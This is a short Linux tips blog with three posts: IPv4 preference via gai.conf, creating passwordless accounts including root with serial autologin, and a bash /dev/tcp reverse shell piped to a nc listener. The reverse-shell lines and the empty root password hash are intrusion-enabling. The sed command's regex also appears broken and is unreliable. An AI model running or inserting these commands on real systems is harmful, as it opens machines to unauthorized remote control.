tisdag 18 september 2012

Make linux prefer IPv4 connections

Sometimes a DNS name resolves to both an IPv6 and and IPv4 address.  How do you force a program to choose for instance IPv4 over IPv6.

The answer is to change the file /etc/gai.conf which controls the getaddrinfo() (see man gai.conf)

For instance, append

precedence ::ffff:0:0/96  100
at the end of /etc/gai.conf to give high priority to A records.  The filters can also be more specific and made to apply only to specific addresses or subnets.  It doesn't seem to be able to change on a per-process basis with this approach (and of course it requires you to have root privileges to modify /etc/gai.conf).

Thanks to Lmwangi at http://unix.stackexchange.com/questions/9940/convince-apt-get-not-to-use-ipv6-method

tisdag 4 september 2012

Passwordless account

To create a user with an empty password, the user must first exist in /etc/passwd and /etc/shadow.

The hash of the empty password is U6aMy0wojraho (0 is a zero...) and it should be entered in the second field in the row in /etc/shadow, for instance with

sed -i 's/^root:[^:]:/root:U6aMy0wojraho:/' /etc/shadow

or usermod, or you create a new user with

useradd myuser -p U6aMy0wojraho

To have a terminal (for instance the terminal on the serial port) automatically login without password, add

--autologin root

after the ttyS0 getty entry in /etc/inittab or in the file /etc/init/ttyS0.conf on ubuntu.

Remote shell via bash /dev/tcp socket pipes

On the local machine, listen to a port with nc

nc -l 8080

On the remote machine, connect the tcp connection to a file descriptor, i.e. 4 and connect a bash to it that is using that file descriptor as input and output, and also send stderr to the pipe (it's easier if one can see the error messages).

exec 4<>/dev/tcp/local.machine.com/8080
bash <&4 >&4 2>&4

Now the local machine can issue commands on the remote machine.

Note that /dev/tcp is something that bash makes up, it is not in /dev.